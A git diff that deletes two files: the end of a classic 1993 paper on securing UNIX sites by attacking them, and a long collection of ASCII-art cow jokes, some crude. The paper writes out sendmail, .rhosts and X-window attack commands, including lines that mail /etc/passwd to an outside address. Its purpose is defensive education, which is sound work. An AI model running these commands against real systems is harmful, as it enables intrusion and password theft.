- printf("Can open display: %s\n", hostname);
- }
- evil % opendisplay
- Cannot open display:
-X terminals, though much less powerful than a complete UNIX system, can
-have their own security problems. Many X terminals permit unrestricted
-rsh access, allowing you to start X client programs in the victim's
-terminal with the output appearing on your own screen:
- evil % xhost
- evil % rsh telnet -display
-In any case, give as much thought to your window security as your
-filesystem and network utilities, for it can compromise your system as
-surely as a "+" in your hosts.equiv or a passwordless (root) account.
-Next, you examine sendmail. Sendmail is a very complex program that has
-a long history of security problems, including the infamous "wiz"
-command (hopefully long since disabled on all machines). You can often
-determine the OS, sometimes down to the version number, of the target,
-by looking at the version number returned by sendmail. This, in turn,
-can give you hints as to how vulnerable it might be to any of the
-numerous bugs. In addition, you can see if they run the "decode" alias,
-which has its own set of problems:
- evil % telnet 25
- connecting to host (, port 25
- connection open
- 220 Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
- expn decode
- 250 <"|/usr/bin/uudecode">
- quit
-Running the "decode" alias is a security risk -- it allows potential
-attackers to overwrite any file that is writable by the owner of that
-alias -- often daemon, but potentially any user. Consider this piece of
-mail -- this will place "" in user zen's .rhosts file if it is
- evil % echo "" | uuencode /home/zen/.rhosts | mail
-If no home directories are known or writable, an interesting variation
-of this is to create a bogus /etc/aliases.pag file that contains an
-alias with a command you wish to execute on your target. This may work
-since on many systems the aliases.pag and aliases.dir files, which
-control the system's mail aliases, are writable to the world.
- evil % cat decode
- bin: "| cat /etc/passwd | mail"
- evil % newaliases -oQ/tmp -oA`pwd`/decode
- evil % uuencode decode.pag /etc/aliases.pag | mail
- evil % /usr/lib/sendmail -fbin -om -oi < /dev/null
-A lot of things can be found out by just asking sendmail if an address
-is acceptable (vrfy), or what an address expands to (expn). When the
-finger or rusers services are turned off, vrfy and expn can still be
-used to identify user accounts or targets. Vrfy and expn can also be
-used to find out if the user is piping mail through any program that
-might be exploited (e.g. vacation, mail sorters, etc.). It can be a
-good idea to disable the vrfy and expn commands: in most versions, look
-at the source file srvrsmtp.c, and either delete or change the two lines
-in the CmdTab structure that have the strings "vrfy" and "expn". Sites
-without source can still disable expn and vrfy by just editing the
-sendmail executable with a binary editor and replacing "vrfy" and "expn"
-with blanks. Acquiring a recent version of sendmail (see Appendix D) is
-also an extremely good idea, since there have probably been more
-security bugs reported in sendmail than in any other UNIX program.
-As a sendmail-sendoff, there are two fairly well known bugs that should
-be checked into. The first was definitely fixed in version 5.59 from
-Berkeley; despite the messages below, for versions of sendmail previous
-to 5.59, the "" gets appended, despite the error messages, along
-with all of the typical mail headers, to the file specified:
- % cat evil_sendmail
- telnet 25 << EOSM
- rcpt to: /home/zen/.rhosts
- mail from: zen
- data
- random garbage
- .
- rcpt to: /home/zen/.rhosts
- mail from: zen
- data
- .
- quit
- evil % /bin/sh evil_sendmail
- Trying
- Connected to
- Escape character is '^]'.
- Connection closed by foreign host.
- evil % rlogin -l zen
- Welcome to!
- victim %
-The second hole, fixed only recently, permitted anyone to specify
-arbitrary shell commands and/or pathnames for the sender and/or
-destination address. Attempts to keep details secret were in vain, and
-extensive discussions in mailing lists and usenet news groups led to
-disclosure of how to exploit some versions of the bug. As with many
-UNIX bugs, nearly every vendor's sendmail was vulnerable to the problem,
-since they all share a common source code tree ancestry. Space
-precludes us from discussing it fully, but a typical attack to get the
-password file might look like this:
- evil % telnet 25
- Trying
- Connected to
- Escape character is '^]'.
- 220 Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
- mail from: "|/bin/mail < /etc/passwd"
- 250 "|/bin/mail < /etc/passwd"... Sender ok
- rcpt to: nosuchuser
- 550 nosuchuser... User unknown
- data
- 354 Enter mail, end with "." on a line by itself
- .
- 250 Mail accepted
- quit
- Connection closed by foreign host.
- evil %
-At the time of writing, version 8.6.4 of sendmail (see Appendix D for
-information on how to get this) is reportedly the only variant of
-sendmail with all of the recent security bugs fixed.
-For our final topic of vulnerability, we'll digress from the practical
-strategy we've followed previously to go a bit more into the theoretical
-side, and briefly discuss the notion of trust. The issues and
-implications of vulnerabilities here are a bit more subtle and
-far-reaching than what we've covered before; in the context of this
-paper we use the word trust whenever there is a situation when a server
-(note that any host that allows remote access can be called a server)
-can permit a local resource to be used by a client without password
-authentication when password authentication is normally required. In
-other words, we arbitrarily limit the discussion to clients in disguise.
-There are many ways that a host can trust: .rhosts and hosts.equiv files
-that allow access without password verification; window servers that
-allow remote systems to use and abuse privileges; export files that
-control access via NFS, and more.
-Nearly all of these rely on client IP address to hostname conversion to
-determine whether or not service is to be granted. The simplest method
-uses the /etc/hosts file for a direct lookup. However, today most hosts
-use either DNS (the Domain Name Service), NIS, or both for name lookup
-service. A reverse lookup occurs when a server has an IP address (from
-a client host connecting to it) and wishes to get the corresponding
-client hostname.
-Although the concept of how host trust works is well understood by most
-system administrators, the _dangers_ of trust, and the _practical_
-problem it represents, irrespective of hostname impersonation, is one of
-the least understood problems we know of on the Internet. This goes far
-beyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing
-systems -- indeed, much of the useful services in UNIX are based on the
-concept that well known (to an administrator or user) sites are trusted
-in some way. What is not understood is how networking so tightly binds
-security between what are normally considered disjoint hosts.
-Any form of trust can be spoofed, fooled, or subverted, especially when
-the authority that gets queried to check the credentials of the client
-is either outside of the server's administrative domain, or when the
-trust mechanism is based on something that has a weak form of
-authentication; both are usually the case.
-Obviously, if the host containing the database (either NIS, DNS, or
-whatever) has been compromised, the intruder can convince the target
-host that s/he is coming from any trusted host; it is now sufficient to
-find out which hosts are trusted by the target. This task is often
-greatly helped by examining where system administrators and system
-accounts (such as root, etc.) last logged in from. Going back to our
-target,, you note that root and some other system accounts
-logged in from You change the PTR record for so
-that when you attempt to rlogin in from to, will attempt to look up your hostname and will find what you
-placed in the record. If the record in the DNS database looks like:
-And you change it to:
-then, depending on how naive's system software is,
-will believe the login comes from, and, assuming that is in the /etc/hosts.equiv or /.rhosts files, you will be
-able to login without supplying a password. With NIS, it is a simple
-matter of either editing the host database on the NIS master (if this is
-controlled by the intruder) or of spoofing or forcing NIS (see
-discussion on NIS security above) to supply the target with whatever
-information you desire. Although more complex, interesting, and
-damaging attacks can be mounted via DNS, time and space don't allow
-coverage of these methods here.
-Two methods can be used to prevent such attacks. The first is the most
-direct, but perhaps the most impractical. If your site doesn't use any
-trust, you won't be as vulnerable to host spoofing. The other strategy
-is to use cryptographic protocols. Using the secure RPC protocol (used
-in secure NFS, NIS+, etc.) is one method; although it has been "broken"
-cryptographically, it still provides better assurance than RPC
-authentication schemes that do not use any form of encryption. Other
-solutions, both hardware (smartcards) and software (Kerberos), are being
-developed, but they are either incomplete or require changes to system
-Appendix B details the results of an informal survey taken from a
-variety of hosts on the Internet.
-Protecting the system
-It is our hope that we have demonstrated that even some of the most
-seemingly innocuous services run can offer (sometimes unexpectedly)
-ammunition to determined system crackers. But, of course, if security
-were all that mattered, computers would never be turned on, let alone
-hooked into a network with literally millions of potential intruders.
-Rather than reiterating specific advice on what to switch on or off, we
-instead offer some general suggestions:
-o If you cannot turn off the finger service, consider installing a
-modified finger daemon. It is rarely necessary to reveal a user's home
-directory and the source of last login.
-o Don't run NIS unless it's absolutely necessary. Use NFS as little
-as possible.
-o Never export NFS filesystems unrestricted to the world. Try to
-export file systems read-only where possible.
-o Fortify and protect servers (e.g. hosts that provide a service to
-other hosts -- NFS, NIS, DNS, whatever.) Only allow administrative
-accounts on these hosts.
-o Examine carefully services offered by inetd and the portmapper.
-Eliminate any that aren't explicitly needed. Use Wietse Venema's inetd
-wrappers, if for no other reason than to log the sources of connections
-to your host. This adds immeasurably to the standard UNIX auditing
-features, especially with respect to network attacks. If possible, use
-the loghost mechanism of syslog to collect security-related information
-on a secure host.
-o Eliminate trust unless there is an absolute need for it. Trust is
-your enemy.
-o Use shadow passwords and a passwd command that disallows poor
-passwords. Disable or delete unused/dormant system or user accounts.
-o Keep abreast of current literature (see our suggested reading list and
-bibliography at the end of this paper) and security tools; communicate
-to others about security problems and incidents. At minimum, subscribe
-to the CERT mailing list and phrack magazine (plus the firewalls mailing
-list, if your site is using or thinking about installing a firewall) and
-read the usenet security newsgroups to get the latest information on
-security problems. Ignorance is the deadliest security problem we are
-aware of.
-o Install all vendor security patches as soon as possible, on all of
-your hosts. Examine security patch information for other vendors - many
-bugs (rdist, sendmail) are common to many UNIX variants.
-It is interesting to note that common solutions to security problems
-such as running Kerberos or using one-time passwords or digital tokens
-are ineffective against most of the attacks we discuss here. We
-heartily recommend the use of such systems, but be aware that they are
-_not_ a total security solution -- they are part of a larger struggle to
-defend your system.
-Perhaps none of the methods shown here are surprising; when writing this
-paper, we didn't learn very much about how to break into systems. What
-we _did_ learn was, while testing these methods out on our own systems
-and that of friendly sites, just how effective this set of methods is
-for gaining access to a typical (UNIX) Internet host. Tiring of trying
-to type these in all by hand, and desiring to keep our own systems more
-secure, we decided to implement a security tool (SATAN) that attempts to
-check remote hosts for at least some of the problems discussed here.
-The typical response, when telling people about our paper and our tool
-was something on the order of "that sounds pretty dangerous -- I hope
-you're not going to give it out to everybody. But you since you can
-trust me, may I have a copy of it?"
-We never set out to create a cookbook or toolkit of methods and programs
-on how to break into systems -- instead, we saw that these same methods
-were being used, every day, against ourselves and against friendly
-system administrators. We believe that by propagating information that
-normally wasn't available to those outside of the underworld, we can
-increase security by raising awareness. Trying to restrict access to
-"dangerous" security information has never seemed to be a very effective
-method for increasing security; indeed, the opposite appears to be the
-case, since the system crackers have shown little reticence to share
-their information with each other.
-While it is almost certain that some of the information presented here
-is new material to (aspiring) system crackers, and that some will use it
-to gain unauthorized entrance onto hosts, the evidence presented even by
-our ad hoc tests shows that there is a much larger number of insecure
-sites, simply because the system administrators don't know any better --
-they aren't stupid or slow, they simply are unable to spend the very
-little free time that they have to explore all of the security issues
-that pertain to their systems. Combine that with no easy access to this
-sort of information and you have poorly defended systems. We (modestly)
-hope that this paper will provide badly-needed data on how systems are
-broken into, and further, to explain _why_ certain steps should be taken
-to secure a system. Knowing why something is a problem is, in our
-opinion, the real key to learning and to making an informed, intelligent
-choice as to what security really means for your site.
-Appendix A:
-SATAN (Security Analysis Tool for Auditing Networks)
-Originally conceived some years ago, SATAN is actually the prototype of
-a much larger and more comprehensive vision of a security tool. In its
-current incarnation, SATAN remotely probes and reports various bugs and
-weaknesses in network services and windowing systems, as well as
-detailing as much generally useful information as possible about the
-target(s). It then processes the data with a crude filter and what
-might be termed an expert system to generate the final security
-analysis. While not particularly fast, it is extremely modular and easy
-to modify.
-SATAN consists of several sub-programs, each of which is an executable
-file (perl, shell, compiled C binary, whatever) that tests a host for a
-given potential weakness. Adding further test programs is as simple as
-putting an executable into the main directory with the extension ".sat";
-the driver program will automatically execute it. The driver generates
-a set of targets (using DNS and a fast version of ping together to get
-"live" targets), and then executes each of the programs over each of the
-targets. A data filtering/interpreting program then analyzes the
-output, and lastly a reporting program digests everything into a more
-readable format.
-The entire package, including source code and documentation, will be
-made freely available to the public, via anonymous ftp and by posting it
-to one of the numerous source code groups on the Usenet.
-Appendix B:
-An informal survey conducted on about a dozen Internet sites
-(educational, military, and commercial, with over 200 hosts and 40000
-accounts) revealed that on the average, close to 10 percent of a site's
-accounts had .rhosts files. These files averaged six trusted hosts
-each; however, it was not uncommon to have well over one hundred entries
-in an account's .rhosts file, and on a few occasions, the number was
-over five hundred! (This is not a record one should be proud of
-owning.) In addition, _every_ site directly on the internet (one site
-was mostly behind a firewall) trusted a user or host at another site --
-thus, the security of the site was not under the system administrators
-direct control. The larger sites, with more users and hosts, had a
-lower percentage of users with .rhosts files, but the size of .rhosts
-files increased, as well as the number of trusted off-site hosts.
-Although it was very difficult to verify how many of the entries were
-valid, with such hostnames such as "Makefile", "Message-Id:", and
-"^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as quite a few wildcard entries, we
-question the wisdom of putting a site's security in the hands of its
-users. Many users (especially the ones with larger .rhosts files)
-attempted to put shell-style comments in their .rhosts files, which most
-UNIX systems attempt to resolve as valid host names. Unfortunately, an
-attacker can then use the DNS and NIS hostname spoofing techniques
-discussed earlier to set their hostname to "#" and freely log in. This
-puts a great many sites at risk (at least one major vendor ships their
-systems with comments in their /etc/hosts.equiv files.)
-You might think that these sites were not typical, and, as a matter of
-fact, they weren't. Virtually all of the administrators knew a great
-deal about security and write security programs for a hobby or
-profession, and many of the sites that they worked for did either
-security research or created security products. We can only guess at
-what a "typical" site might look like.
-Appendix C:
-After receiving mail from a site that had been broken into from one of
-our systems, an investigation was started. In time, we found that the
-intruder was working from a list of ".com" (commercial) sites, looking
-for hosts with easy-to steal password files. In this case,
-"easy-to-steal" referred to sites with a guessable NIS domainname and an
-accessible NIS server. Not knowing how far the intruder had gotten, it
-looked like a good idea to warn the sites that were in fact vulnerable
-to password file theft. Of the 656 hosts in the intruder's hit list, 24
-had easy-to-steal password files -- about one in twenty-five hosts! One
-third of these files contained at least one password-less account with
-an interactive shell. With a grand total of 1594 password-file entries,
-a ten-minute run of a publically-available password cracker (Crack)
-revealed more than 50 passwords, using nothing but a low-end Sun
-workstation. Another 40 passwords were found within the next 20
-minutes; and a root password was found in just over an hour. The result
-after a few days of cracking: five root passwords found, 19 out of 24
-password files (eighty percent) with at least one known password, and
-259 of 1594 (one in six) passwords guessed.
-Appendix D:
-How to get some free security resources on the Internet
-Mailing lists:
-o The CERT (Computer Emergency Response Team) advisory mailing list.
-Send e-mail to, and ask to be placed on their mailing
-o The Phrack newsletter. Send an e-mail message to and ask to be added to the list.
-o The Firewalls mailing list. Send the following line to
- subscribe firewalls
-o Computer Underground Digest. Send e-mail to, asking to be placed on the list.
-Free Software:
-COPS (Computer Oracle and Password System) is available via anonymous
-ftp from, in pub/cops/1.04+.
-The tcp wrappers are available via anonymous ftp from,
-in pub/security.
-Crack is available from, in /usenet/comp.sources.misc/volume28.
-TAMU is a UNIX auditing tool that is part of a larger suite of excellent
-tools put out by a group at the Texas A&M University. They can be
-gotten via anonymous ftp at, in pub/security/TAMU.
-Sources for ftpd and many other network utilities can be found in, in packages/bsd-sources.
-Source for ISS (Internet Security Scanner), a tool that remotely scans
-for various network vulnerabilities, is available via anonymous ftp from, in usenet/comp.sources.misc/volume40/iss.
-Securelib is available via anonymous ftp from, in
-The latest version of berkeley sendmail is available via anonymous ftp
-from, in ucb/sendmail.
-Tripwire, a UNIX filesystem integrity checker+, is available via anonymous
-ftp at, in pub/spaf/COAST/Tripwire.
-Baldwin, Robert W., Rule Based Analysis of Computer Security,
-Massachusetts Institute of Technology, June 1987.
-Bellovin, Steve, Using the Domain Name System for System Break-ins,
-1992 (unpublished).
-Massachusetts Institute of Technology, X Window System Protocol,
-Version 11, 1990.
-Shimomura, Tsutomu, private communication.
-Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992.
-Suggested reading:
-Bellovin, Steve -- "Security Problms in the TCP/IP Protocol Suite",
-Computer Communication Review 19 (2), 1989; a comment by Stephen
-Kent appears in volume 19 (3), 1989.
-Garfinkel, Simson and Spafford, Gene, "Practical UNIX Security",
-O'Reilly and Associates, Inc., 1992.
-Hess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol
-Study: Network Information Service", Computer Communication Review
-22 (5) 1992.
-Phreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume
-Four, Issue Forty-Three, File 14 of 27.
-Ranum, Marcus, "Firewalls" internet electronic mailing list, Sept
-Schuba, Christoph, "Addressing Weaknesses in the Domain Name System
-Protocal", Purdue University, August 1993.
-Thompson, Ken, Reflections on Trusting Trust, Communications of the ACM
-27 (8), 1984.
diff --git a/.md/thoughts/txt/ b/.md/thoughts/txt/
deleted file mode 100644
index c3142c8..0000000
--- a/.md/thoughts/txt/
+++ /dev/null
@@ -1,4526 +0,0 @@
- as you've NEVER seen them before!
-- - - - - - - - - - - - - - - - - - - - - - - - -
- (__) (__) (__) (__)
- (oo) (oo) (oo) (oo)
- /-------\/ /-------\/ /-------\/ /-------\/
- / | || / | || / | || / | ||
-* ||----|| * ||W---|| * ||w---|| * ||V---||
- ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^
- Cow Cow laden Same cow Nancy Reagan-type
- with milk after milking cow with milk
- (___) (___) * (___) (___)
- (o o) (o o) \ (o o) (o o)
- /-------\ / /-------\ / \-------\ / /-------\ /
- / | ||O / | ||O | ||O / | ~#>-+|O *
-* ||@\--|| ||,---|| * ||,----| ||,---||
- ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^
- Bull Same bull after Rotc bull after Red-blooded American Bull
- seeing above cow seeing other bull shooting the Rotc
- (__) (__) (__) (__)
- (oo) (oo) (oo) (oo)
- /-------\/-* /-------\/ /-------\/ ~~~~~~~~~~~~~~~~~~~~~
- / | || \ )*)(\/* / * / | ||
-* ||----|| * \ |||/)|/()( ~~~~~~~~~~~~~~
-\/|(/)(/\/(,,/ \)|(/\/|)(/\
- Cow munching Grass munching Cow in water Cow in trouble
- on grass on cow
- (__) (__) * (__) * (__)
- (oo) (oo) \ (oo) | (oo)
- /--------\/ /-oooooo-\/ \-------\/ \-------\/
- * o| || * ooooooooo o o| || / ||
- ||----|| ooooooooooooo ||----||>==/-----||
- ooo^^ ^^ ooooooooooooooooo ^^ ^^ ^^
- Cow taking Cow in deep Cow getting the shit
- a shit shit kicked out of her
- (__)
- (oo) U
- /-------\/ /---V
- / | || * |--| .
-* ||----||
- ^^ ^^
-Cow at 1 meter. Cow at 100 meters. Cow at 10,000 meters.
- (__) )__( vv vv
- (oo) (oo) ||----|| *
- /-------\/ *-------\/ || | /
- / | || / | || /\-------/
-* ||----|| / ||----|| (oo)
- ^^ ^^ vv vv (~~)
-American Cow Polish Cow Australian Cow
- (__) (__) (__)
- (oo) ____ (oo) _---_(oo)
- /-------\/ /- --\/ /- -\/
- / | || / | || /| ||
-* ||----|| * ||___-|| * ||___-||
- ^^ ^^ ^^ ^^ ^^ ^^
-Freshman Cow at Freshman Cow Freshman Cow
-start of school After the "Freshman 15" After the "Freshman 20"
- (__) (__) (__)
- (OO) (@@) (xx)
- /-------\/ /-------\/ /-------\/
- / | || / | || / | ||
-* ||----|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
-Cow who drank Jolt Cow who ate Cow who used Jolt to wash
- psychadelic mushrooms down psychadelic mushrooms
- /\ __
- / \ ||
- (__) (__) \ / (_||_)
- SooS (oo) \/ (oo)
- /------S\/S /-------\/ /S /-------\/
- / | || / | || / S / | ||
- * ||----|| * ||----||___/ S * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
- This cow belonged Ben Franklin owned Abe Lincoln's
- to George Washington this cow cow
- (__)
- * (__) (oo)
- \ (oo) /------\/
- \-------\/ /| |/ |
- | ==$ || / | [) ||
- ||----|| * ||----||
- ^^ ^^ ^^ ^^
- Old "One Arm" belonged This cow was given to
- to Ceasar's Palace Hugh Hefner for his Birthday
- (___) (__) (__)
- ( O ) (oo) (oo)
- /-------\ / \/--------\/
- / | ||V | |
- * ||----|| ||------||
- ^^ ^^ ^^ ^^
- The cyclops that Jason and This cow lived with
- cow had four legs or e
- O__O \_|_/
- (oo) (oo)
- /-------\/ /-------\/
- / | || / | ||
- * ||----|| * ||----||
- ^^ ^^ ^^ ^^
- Cow at Disneyland Cow visiting the Statue of Liberty
- (__) (__)
- ^^ (oo) (--)
- ^^^^ /-------\/ /-\/-\
- ^^^^^ / | || /| |\
- ^^^^^ * ||----|| ^ | | ^
- ^^^^^^^^ ====^^====^^==== | |
-^^^^^^^^^^^^^/ /----\
-^^^^^^^^^^^^^^^^^^ / \ \
-^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^ * ^
- Cow Hanging Ten at Malibu Cow sunning at Fort Lauderdale
- (What a bod, huh guys?)
- )\ (__)
- / \ (oo)
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Cow swimming at Amityville
-(Where Jaws was filmed, for those less educated)
- * (__)
- \ (DD)
- \ /-------\/
- |\ / | ||_\_/
- \ | \ (__) * ||----|
- \\|| \(oo) ^^ ^
- \||\ \\/ Cow chugging brews and staring at
- ^^ \|| sunbathers at Fort Lauderdale
- \\ ||
- \\||
- \||
- ^^ / / / / / / / / / / /
- \\_ / / / / / / / / / / / /
- \_ / / / / / _______ / /
- Cow skiing a Black Diamond at Aspen / / / / | \ / /
- / / / (__)| / /
- / / / (oo)| / /
- ( @@@ ) /-------\/ |
- ( @@ ) (------------) / | ||^_|
- @@ (__) ( *>COUGH<* ) * ||----|
- @@ (oo) . . . ( *>COUGH<* ) ^^ ^
- /--UU--\/ (____________)
- / | || Cow sheltering from English Weather
- * ||---||
- (New) Jersey Cow
- O O O O
- \ \ / /
- \ \ (__) /
- (__) \ \ (xx)/
- (DD) \ +--------+\//
- /-------\/ \| | /
- / | || +--------+
- * ||----||
- ^^ ^^
-Cow fantasizing about "Riding the Mechanical Bull"
- at Gillies in Texas
- o o
- |__| (__) (__)
- (oo) (oo) =(oo)= oo
- /-------\/ /-------vv /-------\/
- / | || / | || / | ||
-* ||----|| * ||----|| * ||----||
- ~~ ~~ ~~ ~~ ~~ ~~
- bill bixby bela lugosi boris karloff claude rains
- male relative cow cow cow
- cow
- x
- xxxx|xxxx
- xxxxxxx|xxxxxxx
- |
- //
- (__) // (__) (__)
- (oo)// (oo)===(oo)
- /-------\// /-------\/ \/-------\
- / | |// / | || || | \
- * ||----| * ||----|| ||----|| *
- ^^ ^^ ^^ ^^ ^^ ^^
- Julie Andrews Cow Siamese cows
- o o (__) ^
- \ / (oo) /
- \ / _____\/___/
- (__) \__/ / /\ / /
- (oo) _______(oo) ^ / * /
- /---------\/ /| ___ \/ / ___/
- / | x=a(b)|| / | { }|| *----/\
- * ||------|| * ||{___}|| / \
- ^^ ^^ ||-----|| / /
- ^^ ^^ ^ ^
- Mathematical Television This cow does Disco
- Cow Cow (That's what comes of
- (developer of (Cow-thode snorting cow-caine)
- cow-culus) Ray Tube)
- o
- | [---]
- | |
- | | |------========|
- /----|---|\ | **** |=======|
- /___/___\___\ o | **** |=======|
- | | ___| |==============|
- | | ___ {(__)} |==============|
- \-----------/ []( )={(oo)} |==============|
- \ \ / / /---===--{ \/ } |
- ----------------- / | NASA |==== |
- | | * ||------||-----^
- ----------------- || | |
- / / \ \ ^^ ^ |
- / ---- \
- ^^ ^^ This cow jumped over the Moon
- (__)
- ([][]) "I have this recurring dream
- __\/_--U about golden arches.".. (__)
- /\ \__ ^ :..("")
- /\\\ / / //\ ____\_____\/ //
- /----^/__/\ /\ // \\/ \___ / //
- \\\____/--\-- // /-/__________/ //
- | | | H H ||
- |_____________|_____________| H H ||
- ^^^^^^^^^^^^^^^^^^ ^^^^^^^
- Some cows get in trouble... Cattle Guard
- ( ( )
- ( ( ) )
- ( ( )
- ( / )
- ( ( \\ )
- ( | // )
- | | (__)
- | | (oo) (__)
- | | ----\/ ______(oo)_____
- | | || ( _)_______(__) )
- **| | ---|| \ __________/
- ``'---------^^
- Cow Hide Cow Pie
- \ | / ___________
- ____________ \ \_# / | ___ | _________
- | | \ #/ | | | | | = = = = |
- | | | | | \\# | |`v'| | | |
- | | \# // | --- ___ | | | || | |
- | | | | | #_// | | | | | |
- | | \\ #_/_______ | | | | | | || | |
- | | | | | \\# /_____/ \ | --- | | |
- | | \# |+ ++| | | |^^^^^^| | | | || | |
- | | \# |+ ++| | | |^^^^^^| | | | || | |
-^^^| (^^^^^) |^^^^^#^| H |_ |^| | |||| | |^^^^^^| |
- | ( ||| ) | # ^^^^^^ | | |||| | | | ||||||| |
- ^^^^^^^^^^^^^________/ /_____ | | |||| | | | ||||||| |
- `v'- ^^^^^^^^^^^^^ | ||||||| |
- || |`. (__) (__) ( )
- (oo) (oo) /---V
- /-------\/ \/ --------\ * | |
- / | || ||_______| \
- * ||W---|| || || *
- ^^ ^^ ^^ ^^
- "Cow Town"
- \ (__) (__)
- \\(oo) (\/)
- /-----\\\/ /-------\/
- / | (##) / | ||
- * ||----||" * ||----||
- ^^ ^^ ~~ ~~
- This cow plays bagpipes. Cow from Beijing
- (__) (__) (__)
- (\/) ($$) (**)
- /-------\/ /-------\/ /-------\/
- / | 666 || / |=====|| / | ||
-* ||----|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
-Satanic cow This cow is a Yuppie Cow in love
- (__) (__)
- (oo) (oo)
- /-'''''-\/ /-------------------\/
- / |'''''|| / | ||
-* ||''''|| * ||----------------||
- ^^ ^^ ^^ ^^
- Cow in Argyle Stretch Cow
- *
- ** **
- * ** * * * **
- * / / \ * *
- \ \ / \ / / (__)
- * / / \ \ (__) \ \ /--------(00)
- / (00) / / / | |( )
- \ /-------\/ \ \ * ||---- ||()
- / / | || / / || ||
- \ \ * ||----|| \ \ ^^ ^^
- / / ^^ ^^ / / Cow Chewing Marbles
- Cow in Heat
- (___)
- (o o)
- /------\ / (__) (__)
- / ____O (oo) (oo)
- | / /----\----\/ /-------\/
- /\oo===| / || / | ||
- | || *||^-----|| * OO----OO
- * ^^ ^^ ^^
- Cowt in the Act low rider cow
- (__) \__\ (__)
- (oo) o (oo) (oo)
- /-------\/ ____\___\/ *+-------\/
- / | || / | || ||______||
-* ||----|| * ||----|| ||----||
-Detroit cow Mustang cow pickup cow
- (__) (__) \_||_~
- (oo) (oo) (*||*)
- /---------------\/ /----\/ /-------\||/
- / | || / || / | ||
-* ||------------|| *-||----|| * ||----||
- li-moo-cow fastback cow teenager's cow
- ____
- (____)
- .xxxx.
- (__) '(oo)`
- (oo) /-----'-\/ `
- /-------\/ / | |============>
- / | || * ||----| (~)
-* ||----|| ~~ ~
- ~~ ~~ Moo-ammar Cowdafi
- holy cow armed and dangerous
- (___) (___)
- (o o) (o o)
- /-------\ / /-------\ /
- / | ||O / | O~ ||O
-* ||,---|| * ||,---||
- ^^ ^^ ^^ ^^
- A Bull A-bomb-in-a-bull No-bull
- (---)
- ( )
- /-----\ (___)
- | | (o o)
- | | | (-----) \ /
- | | | / / \ O
- | * | * | O |
- ^^ ^^ -----
- Coward Phone Bull
- |______| ^^ |______| . : \ (oo)
- . (__||__) . . : \-------\/
- . /_\ /_\ . . . : 8-| ||
- !!! !!! : ||----||
- : ^^ ^^
- The cow that jumped over the moon. : Flying Cow
- ...---...
- ../ / | \ \..
- ./ / / | \ \ \.
- / / / | \ \ \
- / / / | \ \ \
- ^^^^^^^^^^^^^^^^^^^^^^^
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /
- \ | /(__)
- \|/ (oo)
- /---++--\/
- / | || ||
- * ||-++-||
- ^^ ^^ Cow surviving attack by Red Baron
- ..---.. (__)
- / \ (oo)
- | RIP | /-------\/
- | | / | ||
- | | * ||----||
- | | ^^ ^^
- | |
- \\\\\\\\\\\\\\\\\/////////////////
- Elvis's Cow.....Or is it alive and living in tax exile???
- (__)
- (oo)
- /---+ +--\/
- / | | | ||
- * ||-+ +-||
- ^^ ^^ *
- David Copperfield's Cow David Copperfield's other Cow
- (__)
- (oo)
- /-------\/
- / | ||
- * ||----||
- ^^ ^^
- (__) (__)
- (oo) (oo)
- /-------\/ \/-------\
- / | || -^^- || | \
- * ||---- -^^- || *
- ^^ ^^
- (__) (__)
- (oo) (oo)
- /-------\/ \/-------\
- / | || || | \
- * ||----|| ||----|| *
- ^^ ^^ ^^ ^^
- Barnum's Troupe of performing cows
- (__) _--------_
- (oo) |__________| BIG
- /-------\/ XXXXXXXXXX MAC
- / | 007 || __________
- * ||----|| |_ _|
- ^^ ^^ --------
- Cow licenced to kill Enemy Cow after having met previous cow
- (__)
- (oo)
- /'^^^-m
- (__) / '' ` )
- (oo) o /| /|/|_ | /|
- / \/ / / _ / | | | |
- / _\===^ ___\_____/___ |_____|_|
- ___|__/ |/\ (___________(_) //|| ||
- * ^ ^ * ww ww
- Mrs. O'Leary's Cow Cow'nt Dracula
- _(__)_ \ ----------------------------------
- o ( oo /_______________________| (oo) \ | __
- | _/\_| | M O O - B U S T E R S|__\/\ /| | /oo| - Bleaurgh!
- |-| \\____ ------ )_ /| /\
- -|_ \_|-_|^^^^^^^^^^^^^^^^^^^^^^^^^^ 0 _| * \/ *
- \ | __________________________________/
- | W| \ \_/ /----------------- \ \_/ /
- / /\ \ \___/ \___/
- / / \ \
- ^^^ ^^^ Who you gonna call...?
- (__) (__) (__) (----------)
- (00) (-o) (--) . . . ( *>YAWN<* )
- /------\/ /------\/ /------\/ (----------)
- /| || /| || /| ||
- * ||----|| * ||----|| * ||----||
-Cow w/ Glasses Flirtatious cow (winking) Cow after pulling an all nighter
- * (__) (__) (__) (__)
- \ (oo) (oo) (oo) (oo)
- \-------\/ /-------\/ /-------\/ /-------\/
- /| |\ / / \ / \ / / \ \
- //||----||\\ * //------\\ * \\--// * \\----\\
- ^ ^^ ^^ ^ ^ ^ ^ ^ ^ ^
- Cow walking Cow jogging Same cow Cow breaking
- (__)
- (oo) (__) o * (__)
- \/ (oo)/ " | (oo)
- ____| \____ /-------\/(__ o=o=o=|------\/
- ---/ --** / | / | |
- *____/ |___// * ||----|| ||----||
- //--------/ ^^ ^^ ^^ ^^
- |
- |
- |
- |(push)
- |
- (__) |=====|
- (==) \
- /-\/-\ \
- /| |\ \
- ^ | | ^====~~~~==== \
- | | \
- /----\ \
- / \ \ O O O O
- ^ * ^ === / /
- \ \ (__) /
- Cow-abunga Dudes \ \ (xx)/
- \ +--------+\//
- \| | /
- +--------+
- Cow-a-bungee
- ______________
- | D.A.B.'S | (__) (__) (__) (__)
- | USED | (uu) (uu) (uu) (uu)
- | COWS | /-------\/ /-------\/ /-------\/ /-------\/
- |____________| / | || / | || / | || / | ||
- || * ||----|| * ||----|| * ||----|| * ||----||
